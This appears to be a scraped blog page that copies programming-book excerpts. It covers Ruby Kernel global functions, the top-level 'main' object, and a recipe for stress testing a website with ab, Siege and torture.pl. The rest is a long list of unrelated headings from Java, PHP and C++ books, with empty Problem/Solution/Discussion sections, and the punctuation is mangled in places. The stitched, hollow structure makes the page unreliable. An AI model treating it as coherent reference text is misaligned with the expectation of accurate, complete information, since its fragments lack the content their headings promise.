-i was not specified. Otherwise, this
variable is set to the backup file extension specified with
-i.
$-l: true if the -l
option was specified. Read-only.
$-p: true if the interpreter option
-p was specified; false
otherwise. Read-only.
$-W: In Ruby 1.9, this global variable specifies the current
verbose level. It is 0 if the -W0 option was used, and is
2 if any of the options
-w, -v, or
--verbose were used. Otherwise, this variable
is 1. Read-only.

10.2.4. Predefined Global Functions

The Kernel module, which is included by
Object, defines a number of private instance methods
that serve as global functions. Because they are private, they must be
invoked functionally, without an explicit receiver object. And because
they are included by Object, they can be invoked
anywhere—no matter what the value of self is, it will
be an object, and these methods can be implicitly invoked on it. The
functions defined by Kernel can be grouped into
several categories, most of which are covered elsewhere in this chapter
or elsewhere in this book.

10.2.4.1. Keyword functions

The following Kernel functions behave like
language keywords and are documented elsewhere in this book:

block_given?    iterator?       loop            require
callcc          lambda          proc            throw
catch           load            raise

10.2.4.2. Text input, output, and manipulation functions

Kernel defines the following functions most
of which are global variants of IO methods. They
are covered in more detail in Section 10.3:

format          print           puts            sprintf
gets            printf          readline
p               putc            readlines

In Ruby 1.8 (but not 1.9), Kernel also
defines the following global variants of String
methods that operate implicitly on $_:

chomp   chop    gsub    scan    sub
chomp!  chop!   gsub!   split   sub!

10.2.4.3. OS methods

The following Kernel functions allow a Ruby
program to interface with the operating system. They are
platform-dependent and are covered in Section 10.4. Note that
` is the specially named backtick method that
returns the text output by an arbitrary OS shell command:

`       fork    select  system  trap
exec    open    syscall test

10.2.4.4. Warnings, failures, and exiting

The following Kernel functions display
warnings, raise exceptions, cause the program to exit, or register
blocks of code to be run when the program terminates. They are
documented along with OS-specific methods in Section 10.4:

abort   at_exit exit    exit!   fail    warn

10.2.4.5. Reflection functions

The following Kernel functions are part of
Ruby's reflection API and were described in Chapter 8:

binding                         set_trace_func
caller                          singleton_method_added
eval                            singleton_method_removed
global_variables                singleton_method_undefined
local_variables                 trace_var
method_missing                  untrace_var
remove_instance_variable

10.2.4.6. Conversion functions

The following Kernel functions attempt to
convert their arguments to a new type. They were described in Section 3.8.7.3:

Array   Float   Integer String

10.2.4.7. Miscellaneous Kernel functions

The following miscellaneous Kernel functions
don't fit into the previous categories:

autoload                rand                    srand
autoload?               sleep

rand and srand are for
generating random numbers, and are documented in Section 9.3.7. autoload and
autoload? are covered in Section 7.6.3. And sleep is covered in
Section 9.9 and Section 10.4.4.

10.2.5. User-Defined Global Functions

When you define a method with def inside a
class or module declaration and do
not specify a receiver object for the method, the method is created as a
public instance method of self, where
self is the class or module you are defining. Using
def at the top level, outside of any
class or module, is different in
two important ways. First, top-level methods are instance methods of
Object (even though self is not
Object). Second, top-level methods are always
private.

Top-Level self: the Main Object

Because top-level methods become instance methods of
Object, you might expect that the value of
self would be Object. In fact,
however, top-level methods are a special case: methods are defined in
Object, but self is a different
object. This special top-level object is known as the "main" object,
and there is not much to say about it. The class of the
main object is Object, and it
has a singleton to_s method that returns the string
"main".

The fact that top-level methods are defined in
Object means that they are inherited by all objects
(including Module and Class) and
(if not overridden) can be used within any class or instance method
definition. (You can review Ruby's method name resolution algorithm in
Section 7.8 to convince yourself of this.) The fact
that top-level methods are private means that they must be invoked like
functions, without an explicit receiver. In this way, Ruby mimics a
procedural programming paradigm within its strictly object-oriented
framework.

Recipe 21.4. Stress Testing Your Web Site

21.4.1. Problem

You want
to find out how well your web site performs under a heavy load.

21.4.2. Solution

Use a stress-testing and benchmarking tool to simulate a variety of load levels.

21.4.3. Discussion

Stress testing is frequently confused with benchmarking, and it is important to recognize the difference between the two activities.

Benchmarking a web site is often a somewhat casual activity when performed by an individual developer. The most commonly used tool is the

Apache HTTP server benchmarking tool, ab, which is designed to test how many requests per second an HTTP server is capable of serving. For example:

% /usr/bin/ab -n 1000 -c 100 -k
www.example.com/test.php

This test would return a report illustrating the average response time for requests to http://www.example.com/test.php, based on 1,000 requests, grouped in batches of 100 concurrent requests.

While that sort of test has value'it gives you a reasonable estimation of how many requests you can serve per second under normal load'it doesn't tell you much about how your entire web application will behave under heavy load. It only pounds on one URL at a time, after all.

Stress testing is a testing technique whose intent is to break your web application. By testing to a breaking point, you can identify and repair weaknesses in your application, or gain a better understanding of when you will need to add additional hardware. When combined with code profiling, you can also get an idea of what part of your application will need to scale first; i.e., will you need to add more servers to your database cluster before you need to add more frontend web server machines?

An excellent open source tool for stress testing is Siege. Siege can be configured to read a large number of URLs from a configuration file and run through them in order (regression testing), or it can read a list or URLs and hit them randomly, which better approximates real-world usage of a web site. Siege can also pound on a single URL in a similar fashion to ab.

If you are unable to install Siege on your system, Lincoln Stein's torture.pl script is a good alternative. Many of Siege's design concepts were inspired by torture.pl, and the two tools produce similar reports.

21.4.4. See Also

Source and documentation for Siege at http://www.joedog.org/JoeDog/Siege; ab at http://httpd.apache.org/docs/2.0/programs/ab.html; source and documentation for torture.pl at http://stein.cshl.org/~lstein/torture/.

Monday, January 11, 2010

Recipe 18.6. Keeping Passwords Out of Your Site Files

18.6.1. Problem

18.6.2. Solution

18.6.3. Discussion

18.6.4. See Also

GIM Research Frameworks

Recipe 7.17. Defining Static Properties and Methods

7.17.1. Problem

7.17.2. Solution

7.17.3. Discussion

Sharing a static method across instances

7.17.4. See Also

24.2 - The Stack

5.4. Code Injection

10. Strings

10.1. Arrays do not override Object.toString

10.2. String.replaceAll takes a regular expression as its first argument

10.3. String.replaceAll takes a replacement string as its second argument

10.4. Repeated string concatenation can cause poor performance

10.5. Conversion of bytes to characters requires a charset

10.6. Values of type char are silently converted to int, not String

Member Classes

Methods

Example

Class Description

Description

The Class Relationship Diagram of underflow_error

We Want to Hear from You!

Program 86: Lack of Self-Awareness

Recipe 10.3. Connecting to an SQL Database

10.3.1. Problem

10.3.2. Solution

Connecting with PDO

10.3.3. Discussion

10.3.4. See Also

Recipe 1.12. Generating Fixed-Width Field Data Records

1.12.1. Problem

1.12.2. Solution

Generating fixed-width field data records

1.12.3. Discussion

Generating fixed-width field data records without pack( )

1.12.4. See Also

Recipe 21.5. Avoiding Regular Expressions

21.5.1. Problem

21.5.2. Solution

21.5.3. Discussion

21.5.4. See Also

10.2. The Top-Level Environment

10.2.1. Predefined Modules and Classes

10.2.2. Top-Level Constants

10.2.3. Global Variables

10.2.3.1. Global settings

10.2.3.2. Exception-handling globals

10.2.3.3. Streams and text-processing globals

10.2.3.4. Pattern-matching globals

10.2.3.5. Command-line option globals

10.2.4. Predefined Global Functions

10.2.4.1. Keyword functions

10.2.4.2. Text input, output, and manipulation functions

10.2.4.3. OS methods

10.2.4.4. Warnings, failures, and exiting

10.2.4.5. Reflection functions

10.2.4.6. Conversion functions

10.2.4.7. Miscellaneous Kernel functions

10.2.5. User-Defined Global Functions

Top-Level self: the Main Object

Recipe 21.4. Stress Testing Your Web Site

21.4.1. Problem

21.4.2. Solution

21.4.3. Discussion

21.4.4. See Also

Blog Archive

About Me

Link

10.1. Arrays do not override `Object.toString`

10.2. `String.replaceAll` takes a regular expression as its first argument

10.3. `String.replaceAll` takes a replacement string as its second argument

10.6. Values of type `char` are silently converted to `int`, not `String`